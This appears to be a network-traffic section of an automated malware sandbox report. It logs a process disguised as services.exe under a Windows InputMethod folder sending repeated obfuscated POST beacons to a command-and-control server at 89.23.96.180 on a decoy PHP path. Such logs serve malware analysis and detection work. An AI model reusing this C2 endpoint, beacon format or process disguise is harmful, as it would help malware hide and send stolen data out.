                                                              Dec 21, 2024 10:48:40.402971029 CET422OUTPOST /03/authtraffic_1/PythonApi/Linux/8Cdnsecureprotect/multi/1/mariadb7Cdn/24/Lowlongpollvm/ImagepythonRequestLowGeocpuwpTemporary.php HTTP/1.1
                                                              Content-Type: application/octet-stream
                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53
                                                              Host: 89.23.96.180
                                                              Content-Length: 2536
                                                              Expect: 100-continue
                                                              Connection: Keep-Alive
                                                              Dec 21, 2024 10:48:40.752748013 CET2536OUTData Raw: 58 54 43 51 5d 5f 52 52 55 5e 55 5a 54 58 50 56 57 52 5c 5c 52 5e 51 58 5f 5d 58 5e 54 5c 5d 59 5f 5b 54 58 5a 5f 53 5f 59 5a 55 5e 54 57 51 5d 52 56 5b 41 5d 52 57 52 59 5e 50 52 54 56 58 58 50 5b 58 5c 5a 5e 51 56 5d 5f 42 5a 44 5f 5f 55 5b 5c
                                                              Data Ascii: XTCQ]_RRU^UZTXPVWR\\R^QX_]X^T\]Y_[TXZ_S_YZU^TWQ]RV[A]RWRY^PRTVXXP[X\Z^QV]_BZD__U[\X^TZ\_U_VRZQQVPV\]XYXRXSFYXX__^RTWCZPV]Y\^T[[_UQ]^RX][Y^]QXUYWWZPGUX^R]CC_\^PYAVYZ^YVR^ZP[T\PPF^__B[UY -! $==V?!_-/X$? .)7/!]&"6*$0>=,Z>5!_.#Q,*
                                                              Dec 21, 2024 10:48:41.782668114 CET25INHTTP/1.1 100 Continue
                                                              Dec 21, 2024 10:48:42.013999939 CET200INHTTP/1.1 200 OK
                                                              Server: nginx
                                                              Date: Sat, 21 Dec 2024 09:48:41 GMT
                                                              Content-Type: text/html; charset=UTF-8
                                                              Transfer-Encoding: chunked
                                                              Connection: keep-alive
                                                              Vary: Accept-Encoding
                                                              Data Raw: 34 0d 0a 3c 56 40 5b 0d 0a 30 0d 0a 0d 0a
                                                              Data Ascii: 4<V@[0


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              54192.168.2.54994989.23.96.180801352C:\Windows\InputMethod\CHT\services.exe
                                                              TimestampBytes transferredDirectionData
                                                              Dec 21, 2024 10:48:41.440223932 CET422OUTPOST /03/authtraffic_1/PythonApi/Linux/8Cdnsecureprotect/multi/1/mariadb7Cdn/24/Lowlongpollvm/ImagepythonRequestLowGeocpuwpTemporary.php HTTP/1.1
                                                              Content-Type: application/octet-stream
                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53
                                                              Host: 89.23.96.180
                                                              Content-Length: 2112
                                                              Expect: 100-continue
                                                              Connection: Keep-Alive
                                                              Dec 21, 2024 10:48:41.799827099 CET2112OUTData Raw: 5d 55 46 55 58 5c 52 52 55 5e 55 5a 54 5e 50 5c 57 5d 5c 58 52 54 51 5e 5f 5d 58 5e 54 5c 5d 59 5f 5b 54 58 5a 5f 53 5f 59 5a 55 5e 54 57 51 5d 52 56 5b 41 5d 52 57 52 59 5e 50 52 54 56 58 58 50 5b 58 5c 5a 5e 51 56 5d 5f 42 5a 44 5f 5f 55 5b 5c
                                                              Data Ascii: ]UFUX\RRU^UZT^P\W]\XRTQ^_]X^T\]Y_[TXZ_S_YZU^TWQ]RV[A]RWRY^PRTVXXP[X\Z^QV]_BZD__U[\X^TZ\_U_VRZQQVPV\]XYXRXSFYXX__^RTWCZPV]Y\^T[[_UQ]^RX][Y^]QXUYWWZPGUX^R]CC_\^PYAVYZ^YVR^ZP[T\PPF^__B[UY#91<1.6)9./$,0W9%V "%*+B8>-'>!_.#Q,2
                                                              Dec 21, 2024 10:48:42.818876982 CET25INHTTP/1.1 100 Continue
                                                              Dec 21, 2024 10:48:43.054467916 CET349INHTTP/1.1 200 OK
                                                              Server: nginx
                                                              Date: Sat, 21 Dec 2024 09:48:42 GMT
                                                              Content-Type: text/html; charset=UTF-8
                                                              Transfer-Encoding: chunked
                                                              Connection: keep-alive
                                                              Vary: Accept-Encoding
                                                              Data Raw: 39 38 0d 0a 0e 1e 39 53 20 15 26 0d 2b 29 33 13 3e 06 36 1c 29 3d 2a 15 2e 21 30 02 21 3f 3a 5e 3e 03 24 03 33 2e 33 5b 21 5c 2d 11 36 06 2f 5f 3d 21 2e 58 01 1e 22 19 34 0a 3e 0c 27 11 01 52 29 0e 32 5c 2b 10 2a 58 33 01 0e 0e 25 2a 28 1b 28 3a 0d 0f 25 2d 32 58 3b 01 3c 07 28 00 28 1e 24 26 2b 51 03 1e 26 11 26 2c 0d 1f 32 55 39 5e 25 3e 04 06 20 10 27 56 2a 3b 33 51 34 2b 39 04 2d 2a 38 5e 28 5b 39 02 2a 06 25 06 25 2f 28 08 26 14 23 54 2d 00 2c 48 00 31 5d 56 0d 0a 30 0d 0a 0d 0a
                                                              Data Ascii: 989S &+)3>6)=*.!0!?:^>$3.3[!\-6/_=!.X"4>'R)2\+*X3%*((:%-2X;<(($&+Q&&,2U9^%> 'V*;3Q4+9-*8^([9*%%/(&#T-,H1]V0


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              55192.168.2.54995089.23.96.180801352C:\Windows\InputMethod\CHT\services.exe
                                                              TimestampBytes transferredDirectionData
                                                              Dec 21, 2024 10:48:42.268290043 CET398OUTPOST /03/authtraffic_1/PythonApi/Linux/8Cdnsecureprotect/multi/1/mariadb7Cdn/24/Lowlongpollvm/ImagepythonRequestLowGeocpuwpTemporary.php HTTP/1.1
                                                              Content-Type: application/octet-stream
                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53
                                                              Host: 89.23.96.180
                                                              Content-Length: 2536
                                                              Expect: 100-continue
                                                              Dec 21, 2024 10:48:42.627696991 CET2536OUTData Raw: 58 52 43 51 5d 58 52 52 55 5e 55 5a 54 53 50 57 57 5d 5c 5b 52 52 51 5c 5f 5d 58 5e 54 5c 5d 59 5f 5b 54 58 5a 5f 53 5f 59 5a 55 5e 54 57 51 5d 52 56 5b 41 5d 52 57 52 59 5e 50 52 54 56 58 58 50 5b 58 5c 5a 5e 51 56 5d 5f 42 5a 44 5f 5f 55 5b 5c
                                                              Data Ascii: XRCQ]XRRU^UZTSPWW]\[RRQ\_]X^T\]Y_[TXZ_S_YZU^TWQ]RV[A]RWRY^PRTVXXP[X\Z^QV]_BZD__U[\X^TZ\_U_VRZQQVPV\]XYXRXSFYXX__^RTWCZPV]Y\^T[[_UQ]^RX][Y^]QXUYWWZPGUX^R]CC_\^PYAVYZ^YVR^ZP[T\PPF^__B[UY .,%=9V)19+$,':#/=['"+$^?8)%!_.#Q,
                                                              Dec 21, 2024 10:48:43.647444963 CET25INHTTP/1.1 100 Continue
                                                              Dec 21, 2024 10:48:43.882312059 CET200INHTTP/1.1 200 OK
                                                              Server: nginx
                                                              Date: Sat, 21 Dec 2024 09:48:43 GMT
                                                              Content-Type: text/html; charset=UTF-8
                                                              Transfer-Encoding: chunked
                                                              Connection: keep-alive
                                                              Vary: Accept-Encoding
                                                              Data Raw: 34 0d 0a 3c 56 40 5b 0d 0a 30 0d 0a 0d 0a
                                                              Data Ascii: 4<V@[0


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              56192.168.2.54995689.23.96.180801352C:\Windows\InputMethod\CHT\services.exe
                                                              TimestampBytes transferredDirectionData
                                                              Dec 21, 2024 10:48:44.118333101 CET398OUTPOST /03/authtraffic_1/PythonApi/Linux/8Cdnsecureprotect/multi/1/mariadb7Cdn/24/Lowlongpollvm/ImagepythonRequestLowGeocpuwpTemporary.php HTTP/1.1
                                                              Content-Type: application/octet-stream
                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53
                                                              Host: 89.23.96.180
                                                              Content-Length: 2536
                                                              Expect: 100-continue
                                                              Dec 21, 2024 10:48:44.471466064 CET2536OUTData Raw: 58 56 43 5e 5d 5c 57 5e 55 5e 55 5a 54 5e 50 50 57 59 5c 55 52 5f 51 5f 5f 5d 58 5e 54 5c 5d 59 5f 5b 54 58 5a 5f 53 5f 59 5a 55 5e 54 57 51 5d 52 56 5b 41 5d 52 57 52 59 5e 50 52 54 56 58 58 50 5b 58 5c 5a 5e 51 56 5d 5f 42 5a 44 5f 5f 55 5b 5c
                                                              Data Ascii: XVC^]\W^U^UZT^PPWY\UR_Q__]X^T\]Y_[TXZ_S_YZU^TWQ]RV[A]RWRY^PRTVXXP[X\Z^QV]_BZD__U[\X^TZ\_U_VRZQQVPV\]XYXRXSFYXX__^RTWCZPV]Y\^T[[_UQ]^RX][Y^]QXUYWWZPGUX^R]CC_\^PYAVYZ^YVR^ZP[T\PPF^__B[UY .W'&>">6-/0?/-%S >%"+;?> [+5!_.#Q,2
                                                              Dec 21, 2024 10:48:45.493215084 CET25INHTTP/1.1 100 Continue
                                                              Dec 21, 2024 10:48:45.726149082 CET200INHTTP/1.1 200 OK
                                                              Server: nginx
                                                              Date: Sat, 21 Dec 2024 09:48:45 GMT
                                                              Content-Type: text/html; charset=UTF-8
                                                              Transfer-Encoding: chunked
                                                              Connection: keep-alive
                                                              Vary: Accept-Encoding
                                                              Data Raw: 34 0d 0a 3c 56 40 5b 0d 0a 30 0d 0a 0d 0a
                                                              Data Ascii: 4<V@[0


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              57192.168.2.54996289.23.96.180801352C:\Windows\InputMethod\CHT\services.exe
                                                              TimestampBytes transferredDirectionData
                                                              Dec 21, 2024 10:48:45.961669922 CET422OUTPOST /03/authtraffic_1/PythonApi/Linux/8Cdnsecureprotect/multi/1/mariadb7Cdn/24/Lowlongpollvm/ImagepythonRequestLowGeocpuwpTemporary.php HTTP/1.1
                                                              Content-Type: application/octet-stream
                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53
                                                              Host: 89.23.96.180
                                                              Content-Length: 2536
                                                              Expect: 100-continue
                                                              Connection: Keep-Alive
                                                              Dec 21, 2024 10:48:46.315282106 CET2536OUTData Raw: 58 56 43 57 58 5b 57 56 55 5e 55 5a 54 53 50 5d 57 5e 5c 5a 52 52 51 5f 5f 5d 58 5e 54 5c 5d 59 5f 5b 54 58 5a 5f 53 5f 59 5a 55 5e 54 57 51 5d 52 56 5b 41 5d 52 57 52 59 5e 50 52 54 56 58 58 50 5b 58 5c 5a 5e 51 56 5d 5f 42 5a 44 5f 5f 55 5b 5c
                                                              Data Ascii: XVCWX[WVU^UZTSP]W^\ZRRQ__]X^T\]Y_[TXZ_S_YZU^TWQ]RV[A]RWRY^PRTVXXP[X\Z^QV]_BZD__U[\X^TZ\_U_VRZQQVPV\]XYXRXSFYXX__^RTWCZPV]Y\^T[[_UQ]^RX][Y^]QXUYWWZPGUX^R]CC_\^PYAVYZ^YVR^ZP[T\PPF^__B[UY @-1/1.5Q=&.#0?,95"?%X'26Q<#^(X+%!_.#Q,
                                                              Dec 21, 2024 10:48:47.357382059 CET25INHTTP/1.1 100 Continue
                                                              Dec 21, 2024 10:48:47.591365099 CET200INHTTP/1.1 200 OK
                                                              Server: nginx
                                                              Date: Sat, 21 Dec 2024 09:48:47 GMT
                                                              Content-Type: text/html; charset=UTF-8
                                                              Transfer-Encoding: chunked
                                                              Connection: keep-alive
                                                              Vary: Accept-Encoding
                                                              Data Raw: 34 0d 0a 3c 56 40 5b 0d 0a 30 0d 0a 0d 0a
                                                              Data Ascii: 4<V@[0


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              58192.168.2.54996589.23.96.180801352C:\Windows\InputMethod\CHT\services.exe
                                                              TimestampBytes transferredDirectionData
                                                              Dec 21, 2024 10:48:47.843193054 CET422OUTPOST /03/authtraffic_1/PythonApi/Linux/8Cdnsecureprotect/multi/1/mariadb7Cdn/24/Lowlongpollvm/ImagepythonRequestLowGeocpuwpTemporary.php HTTP/1.1
                                                              Content-Type: application/octet-stream
                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53
                                                              Host: 89.23.96.180
                                                              Content-Length: 2536
                                                              Expect: 100-continue
                                                              Connection: Keep-Alive


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              59192.168.2.54996989.23.96.180801352C:\Windows\InputMethod\CHT\services.exe
                                                              TimestampBytes transferredDirectionData
                                                              Dec 21, 2024 10:48:48.194130898 CET422OUTPOST /03/authtraffic_1/PythonApi/Linux/8Cdnsecureprotect/multi/1/mariadb7Cdn/24/Lowlongpollvm/ImagepythonRequestLowGeocpuwpTemporary.php HTTP/1.1
                                                              Content-Type: application/octet-stream
                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53
                                                              Host: 89.23.96.180
                                                              Content-Length: 2100
                                                              Expect: 100-continue
                                                              Connection: Keep-Alive
                                                              Dec 21, 2024 10:48:48.549829960 CET2100OUTData Raw: 58 53 43 53 58 5c 52 53 55 5e 55 5a 54 5b 50 50 57 59 5c 5f 52 56 51 59 5f 5d 58 5e 54 5c 5d 59 5f 5b 54 58 5a 5f 53 5f 59 5a 55 5e 54 57 51 5d 52 56 5b 41 5d 52 57 52 59 5e 50 52 54 56 58 58 50 5b 58 5c 5a 5e 51 56 5d 5f 42 5a 44 5f 5f 55 5b 5c
                                                              Data Ascii: XSCSX\RSU^UZT[PPWY\_RVQY_]X^T\]Y_[TXZ_S_YZU^TWQ]RV[A]RWRY^PRTVXXP[X\Z^QV]_BZD__U[\X^TZ\_U_VRZQQVPV\]XYXRXSFYXX__^RTWCZPV]Y\^T[[_UQ]^RX][Y^]QXUYWWZPGUX^R]CC_\^PYAVYZ^YVR^ZP[T\PPF^__B[UY :W/1-=5-0]'8U,8 <%[&<'#<$Z)!_.#Q,2
                                                              Dec 21, 2024 10:48:49.586607933 CET25INHTTP/1.1 100 Continue
                                                              Dec 21, 2024 10:48:49.822242022 CET349INHTTP/1.1 200 OK
                                                              Server: nginx
                                                              Date: Sat, 21 Dec 2024 09:48:49 GMT
                                                              Content-Type: text/html; charset=UTF-8
                                                              Transfer-Encoding: chunked
                                                              Connection: keep-alive
                                                              Vary: Accept-Encoding
                                                              Data Raw: 39 38 0d 0a 0e 1e 3a 0f 23 15 07 11 3c 03 23 5e 2a 2f 2a 54 29 3e 3d 00 2c 54 2c 03 21 2c 29 00 3e 04 37 58 27 10 30 04 36 2a 2d 58 22 11 2b 12 3e 31 2e 58 01 1e 22 18 20 33 31 53 27 2c 37 55 28 24 2d 05 3c 2d 2e 5a 24 3f 34 0e 32 3a 15 07 3c 04 3b 0e 31 3d 0c 5d 2c 3f 09 5f 2b 58 30 56 26 36 2b 51 03 1e 25 04 25 2f 37 54 25 55 3d 13 32 58 25 5d 23 10 3b 1f 3f 3b 34 0b 23 2b 2e 5d 38 07 3b 05 28 3d 2e 5d 3d 06 00 12 30 2f 3b 1b 31 2e 23 54 2d 00 2c 48 00 31 5d 56 0d 0a 30 0d 0a 0d 0a
                                                              Data Ascii: 98:#<#^*/*T)>=,T,!,)>7X'06*-X"+>1.X" 31S',7U($-<-.Z$?42:<;1=],?_+X0V&6+Q%%/7T%U=2X%]#;?;4#+.]8;(=.]=0/;1.#T-,H1]V0


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              60192.168.2.54997089.23.96.180801352C:\Windows\InputMethod\CHT\services.exe
                                                              TimestampBytes transferredDirectionData
                                                              Dec 21, 2024 10:48:48.323137045 CET422OUTPOST /03/authtraffic_1/PythonApi/Linux/8Cdnsecureprotect/multi/1/mariadb7Cdn/24/Lowlongpollvm/ImagepythonRequestLowGeocpuwpTemporary.php HTTP/1.1
                                                              Content-Type: application/octet-stream
                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53
                                                              Host: 89.23.96.180
                                                              Content-Length: 2536
                                                              Expect: 100-continue
                                                              Connection: Keep-Alive
                                                              Dec 21, 2024 10:48:48.674658060 CET2536OUTData Raw: 58 5e 43 5f 58 5d 57 52 55 5e 55 5a 54 5f 50 52 57 5a 5c 5f 52 55 51 5d 5f 5d 58 5e 54 5c 5d 59 5f 5b 54 58 5a 5f 53 5f 59 5a 55 5e 54 57 51 5d 52 56 5b 41 5d 52 57 52 59 5e 50 52 54 56 58 58 50 5b 58 5c 5a 5e 51 56 5d 5f 42 5a 44 5f 5f 55 5b 5c
                                                              Data Ascii: X^C_X]WRU^UZT_PRWZ\_RUQ]_]X^T\]Y_[TXZ_S_YZU^TWQ]RV[A]RWRY^PRTVXXP[X\Z^QV]_BZD__U[\X^TZ\_U_VRZQQVPV\]XYXRXSFYXX__^RTWCZPV]Y\^T[[_UQ]^RX][Y^]QXUYWWZPGUX^R]CC_\^PYAVYZ^YVR^ZP[T\PPF^__B[UY#:1%[:)![.Y %,$T--4*%*44?-_>5!_.#Q,6
                                                              Dec 21, 2024 10:48:49.700807095 CET25INHTTP/1.1 100 Continue
                                                              Dec 21, 2024 10:48:49.934279919 CET200INHTTP/1.1 200 OK
                                                              Server: nginx
                                                              Date: Sat, 21 Dec 2024 09:48:49 GMT
                                                              Content-Type: text/html; charset=UTF-8
                                                              Transfer-Encoding: chunked
                                                              Connection: keep-alive
                                                              Vary: Accept-Encoding
                                                              Data Raw: 34 0d 0a 3c 56 40 5b 0d 0a 30 0d 0a 0d 0a
                                                              Data Ascii: 4<V@[0


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              61192.168.2.54997689.23.96.180801352C:\Windows\InputMethod\CHT\services.exe
                                                              TimestampBytes transferredDirectionData
                                                              Dec 21, 2024 10:48:50.181874037 CET398OUTPOST /03/authtraffic_1/PythonApi/Linux/8Cdnsecureprotect/multi/1/mariadb7Cdn/24/Lowlongpollvm/ImagepythonRequestLowGeocpuwpTemporary.php HTTP/1.1
                                                              Content-Type: application/octet-stream
                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53
                                                              Host: 89.23.96.180
                                                              Content-Length: 2536
                                                              Expect: 100-continue
                                                              Dec 21, 2024 10:48:50.534004927 CET2536OUTData Raw: 5d 52 46 55 5d 5d 52 54 55 5e 55 5a 54 53 50 57 57 5f 5c 59 52 56 51 5e 5f 5d 58 5e 54 5c 5d 59 5f 5b 54 58 5a 5f 53 5f 59 5a 55 5e 54 57 51 5d 52 56 5b 41 5d 52 57 52 59 5e 50 52 54 56 58 58 50 5b 58 5c 5a 5e 51 56 5d 5f 42 5a 44 5f 5f 55 5b 5c
                                                              Data Ascii: ]RFU]]RTU^UZTSPWW_\YRVQ^_]X^T\]Y_[TXZ_S_YZU^TWQ]RV[A]RWRY^PRTVXXP[X\Z^QV]_BZD__U[\X^TZ\_U_VRZQQVPV\]XYXRXSFYXX__^RTWCZPV]Y\^T[[_UQ]^RX][Y^]QXUYWWZPGUX^R]CC_\^PYAVYZ^YVR^ZP[T\PPF^__B[UY E-3%=-=1[-#3<W.(-V#/2"V?7(?[ >!_.#Q,
                                                              Dec 21, 2024 10:48:51.559262991 CET25INHTTP/1.1 100 Continue
                                                              Dec 21, 2024 10:48:51.794218063 CET200INHTTP/1.1 200 OK
                                                              Server: nginx
                                                              Date: Sat, 21 Dec 2024 09:48:51 GMT
                                                              Content-Type: text/html; charset=UTF-8
                                                              Transfer-Encoding: chunked
                                                              Connection: keep-alive
                                                              Vary: Accept-Encoding
                                                              Data Raw: 34 0d 0a 3c 56 40 5b 0d 0a 30 0d 0a 0d 0a
                                                              Data Ascii: 4<V@[0


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              62192.168.2.54997889.23.96.180801352C:\Windows\InputMethod\CHT\services.exe
                                                              TimestampBytes transferredDirectionData
                                                              Dec 21, 2024 10:48:52.139067888 CET422OUTPOST /03/authtraffic_1/PythonApi/Linux/8Cdnsecureprotect/multi/1/mariadb7Cdn/24/Lowlongpollvm/ImagepythonRequestLowGeocpuwpTemporary.php HTTP/1.1
                                                              Content-Type: application/octet-stream
                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53
                                                              Host: 89.23.96.180
                                                              Content-Length: 2536
                                                              Expect: 100-continue
                                                              Connection: Keep-Alive
                                                              Dec 21, 2024 10:48:52.491070986 CET2536OUTData Raw: 5d 51 43 51 58 5b 57 50 55 5e 55 5a 54 5a 50 56 57 5c 5c 5f 52 5e 51 5c 5f 5d 58 5e 54 5c 5d 59 5f 5b 54 58 5a 5f 53 5f 59 5a 55 5e 54 57 51 5d 52 56 5b 41 5d 52 57 52 59 5e 50 52 54 56 58 58 50 5b 58 5c 5a 5e 51 56 5d 5f 42 5a 44 5f 5f 55 5b 5c
                                                              Data Ascii: ]QCQX[WPU^UZTZPVW\\_R^Q\_]X^T\]Y_[TXZ_S_YZU^TWQ]RV[A]RWRY^PRTVXXP[X\Z^QV]_BZD__U[\X^TZ\_U_VRZQQVPV\]XYXRXSFYXX__^RTWCZPV]Y\^T[[_UQ]^RX][Y^]QXUYWWZPGUX^R]CC_\^PYAVYZ^YVR^ZP[T\PPF^__B[UY A-W<2U)980<<S:5 <!['2>U?0<['>!_.#Q,"
                                                              Dec 21, 2024 10:48:53.516086102 CET25INHTTP/1.1 100 Continue
                                                              Dec 21, 2024 10:48:53.750524044 CET200INHTTP/1.1 200 OK
                                                              Server: nginx
                                                              Date: Sat, 21 Dec 2024 09:48:53 GMT
                                                              Content-Type: text/html; charset=UTF-8
                                                              Transfer-Encoding: chunked
                                                              Connection: keep-alive
                                                              Vary: Accept-Encoding
                                                              Data Raw: 34 0d 0a 3c 56 40 5b 0d 0a 30 0d 0a 0d 0a
                                                              Data Ascii: 4<V@[0


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              63192.168.2.54998489.23.96.180801352C:\Windows\InputMethod\CHT\services.exe
                                                              TimestampBytes transferredDirectionData
                                                              Dec 21, 2024 10:48:53.994893074 CET422OUTPOST /03/authtraffic_1/PythonApi/Linux/8Cdnsecureprotect/multi/1/mariadb7Cdn/24/Lowlongpollvm/ImagepythonRequestLowGeocpuwpTemporary.php HTTP/1.1
                                                              Content-Type: application/octet-stream
                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53
                                                              Host: 89.23.96.180
                                                              Content-Length: 2532
                                                              Expect: 100-continue
                                                              Connection: Keep-Alive
                                                              Dec 21, 2024 10:48:54.346478939 CET2532OUTData Raw: 5d 53 43 5f 5d 5b 57 5e 55 5e 55 5a 54 5b 50 5d 57 5e 5c 5d 52 50 51 57 5f 5d 58 5e 54 5c 5d 59 5f 5b 54 58 5a 5f 53 5f 59 5a 55 5e 54 57 51 5d 52 56 5b 41 5d 52 57 52 59 5e 50 52 54 56 58 58 50 5b 58 5c 5a 5e 51 56 5d 5f 42 5a 44 5f 5f 55 5b 5c
                                                              Data Ascii: ]SC_][W^U^UZT[P]W^\]RPQW_]X^T\]Y_[TXZ_S_YZU^TWQ]RV[A]RWRY^PRTVXXP[X\Z^QV]_BZD__U[\X^TZ\_U_VRZQQVPV\]XYXRXSFYXX__^RTWCZPV]Y\^T[[_UQ]^RX][Y^]QXUYWWZPGUX^R]CC_\^PYAVYZ^YVR^ZP[T\PPF^__B[UY E910W&.%=69?'$W.8S"/9['!"P<B(?;=!_.#Q,


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              64192.168.2.54998989.23.96.180801352C:\Windows\InputMethod\CHT\services.exe
                                                              TimestampBytes transferredDirectionData
                                                              Dec 21, 2024 10:48:54.975490093 CET422OUTPOST /03/authtraffic_1/PythonApi/Linux/8Cdnsecureprotect/multi/1/mariadb7Cdn/24/Lowlongpollvm/ImagepythonRequestLowGeocpuwpTemporary.php HTTP/1.1
                                                              Content-Type: application/octet-stream
                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53
                                                              Host: 89.23.96.180
                                                              Content-Length: 2112
                                                              Expect: 100-continue
                                                              Connection: Keep-Alive
                                                              Dec 21, 2024 10:48:55.331592083 CET2112OUTData Raw: 58 53 46 50 5d 5d 57 52 55 5e 55 5a 54 52 50 53 57 5b 5c 54 52 5f 51 5c 5f 5d 58 5e 54 5c 5d 59 5f 5b 54 58 5a 5f 53 5f 59 5a 55 5e 54 57 51 5d 52 56 5b 41 5d 52 57 52 59 5e 50 52 54 56 58 58 50 5b 58 5c 5a 5e 51 56 5d 5f 42 5a 44 5f 5f 55 5b 5c
                                                              Data Ascii: XSFP]]WRU^UZTRPSW[\TR_Q\_]X^T\]Y_[TXZ_S_YZU^TWQ]RV[A]RWRY^PRTVXXP[X\Z^QV]_BZD__U[\X^TZ\_U_VRZQQVPV\]XYXRXSFYXX__^RTWCZPV]Y\^T[[_UQ]^RX][Y^]QXUYWWZPGUX^R]CC_\^PYAVYZ^YVR^ZP[T\PPF^__B[UY#.1/1=9,,$Y'U-;)7?!\'"5(+8^>%!_.#Q,
                                                              Dec 21, 2024 10:48:56.349797964 CET25INHTTP/1.1 100 Continue
                                                              Dec 21, 2024 10:48:56.582842112 CET349INHTTP/1.1 200 OK
                                                              Server: nginx
                                                              Date: Sat, 21 Dec 2024 09:48:56 GMT
                                                              Content-Type: text/html; charset=UTF-8
                                                              Transfer-Encoding: chunked
                                                              Connection: keep-alive
                                                              Vary: Accept-Encoding
                                                              Data Raw: 39 38 0d 0a 0e 1e 39 53 20 02 3d 11 2b 14 2c 03 3d 2f 00 57 3d 3e 3e 16 2f 32 20 04 36 2c 07 02 28 3d 27 13 30 3d 3b 58 21 03 32 04 22 3f 3c 07 2a 1b 2e 58 01 1e 21 44 37 1d 2e 0c 25 3f 37 55 28 37 2a 16 3f 10 26 59 27 2f 30 0e 24 39 2b 00 3c 03 23 0c 25 3e 2e 1f 38 06 3b 5f 29 3d 33 0e 24 1c 2b 51 03 1e 26 10 25 12 0d 53 25 33 29 11 26 2d 26 00 23 2e 37 54 29 16 2f 57 21 28 3a 5e 2f 39 0e 1b 2b 04 25 03 3d 01 3e 59 24 5a 2b 19 26 04 23 54 2d 00 2c 48 00 31 5d 56 0d 0a 30 0d 0a 0d 0a
                                                              Data Ascii: 989S =+,=/W=>>/2 6,(='0=;X!2"?<*.X!D7.%?7U(7*?&Y'/0$9+<#%>.8;_)=3$+Q&%S%3)&-&#.7T)/W!(:^/9+%=>Y$Z+&#T-,H1]V0


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              65192.168.2.54999089.23.96.180801352C:\Windows\InputMethod\CHT\services.exe
                                                              TimestampBytes transferredDirectionData
                                                              Dec 21, 2024 10:48:55.227880001 CET422OUTPOST /03/authtraffic_1/PythonApi/Linux/8Cdnsecureprotect/multi/1/mariadb7Cdn/24/Lowlongpollvm/ImagepythonRequestLowGeocpuwpTemporary.php HTTP/1.1
                                                              Content-Type: application/octet-stream
                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53
                                                              Host: 89.23.96.180
                                                              Content-Length: 2536
                                                              Expect: 100-continue
                                                              Connection: Keep-Alive
                                                              Dec 21, 2024 10:48:55.580857992 CET2536OUTData Raw: 5d 56 43 56 5d 5d 57 57 55 5e 55 5a 54 5e 50 53 57 5b 5c 5d 52 52 51 5a 5f 5d 58 5e 54 5c 5d 59 5f 5b 54 58 5a 5f 53 5f 59 5a 55 5e 54 57 51 5d 52 56 5b 41 5d 52 57 52 59 5e 50 52 54 56 58 58 50 5b 58 5c 5a 5e 51 56 5d 5f 42 5a 44 5f 5f 55 5b 5c
                                                              Data Ascii: ]VCV]]WWU^UZT^PSW[\]RRQZ_]X^T\]Y_[TXZ_S_YZU^TWQ]RV[A]RWRY^PRTVXXP[X\Z^QV]_BZD__U[\X^TZ\_U_VRZQQVPV\]XYXRXSFYXX__^RTWCZPV]Y\^T[[_UQ]^RX][Y^]QXUYWWZPGUX^R]CC_\^PYAVYZ^YVR^ZP[T\PPF^__B[UY D.11==:9,0%?8-*"/62!6V+[(=,)!_.#Q,2
                                                              Dec 21, 2024 10:48:56.594433069 CET25INHTTP/1.1 100 Continue
                                                              Dec 21, 2024 10:48:56.834234953 CET200INHTTP/1.1 200 OK
                                                              Server: nginx
                                                              Date: Sat, 21 Dec 2024 09:48:56 GMT
                                                              Content-Type: text/html; charset=UTF-8
                                                              Transfer-Encoding: chunked
                                                              Connection: keep-alive
                                                              Vary: Accept-Encoding
